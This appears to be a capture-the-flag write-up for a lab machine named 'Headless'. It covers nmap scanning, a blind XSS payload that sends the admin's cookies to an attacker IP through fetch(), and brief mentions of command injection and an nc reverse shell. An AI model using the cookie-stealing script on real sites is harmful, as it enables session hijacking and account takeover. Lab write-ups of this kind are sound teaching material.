# HEADLESS

### NMAP

```bash
nmap -p- --min-rate=10000 -v $IP

PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
```

```bash
nmap -p22,5000 -sVC -v $IP

PORT     STATE SERVICE VERSION

22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA)
|_  256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519)

5000/tcp open  http    Werkzeug httpd 2.2.2 (Python 3.11.2)
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-title: Under Construction
|_http-server-header: Werkzeug/2.2.2 Python/3.11.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### ENUMERATING THE WEB SERVER

SINCE IT IS RUNNING ON PYTHON FIRST VULN CAME TO MY MIND IS SSTI

TESTED BASIC SSTI AND WE CAN SOME ERROR

![image.png]image.png)

IT SAYS YOUR BROWSER INFO WILL BE SHARED WITH ADMINSTRATOR

Trying a simple blind xss payload

![image.png]image%201.png)

WE GOT A PING FROM THW WEB SERVER

![image.png]image%202.png)

STEALING THE COOKIES

![image.png]image%203.png)

![image.png]image%204.png)

```bash
<script> 
fetch('http://10.10.16.3:80/?cookie='+document.cookie)
  .then(response => response.json())
  .then(data => console.log(data))
  .catch(error => console.error('Error:', error)); 
</script>
```

NOW NAVIGATING TO THE dashboard we got page with the cookie

![image.png]image%205.png)

Here is a simple generate report functionality

![image.png]image%206.png)

IT USES A DATE POST PARAMETER MAYBE THEY RUN SOME SCRIPTS IN BACKGROUNG SO TRYING COMMAND INJECTION

![image.png]image%207.png)

NOW GETTING A REVERSE SHELL USING NC

![image.png]image%208.png)

![image.png]image%209.png)

![image.png]image%2010.png)

GOT THE USERS FLAG
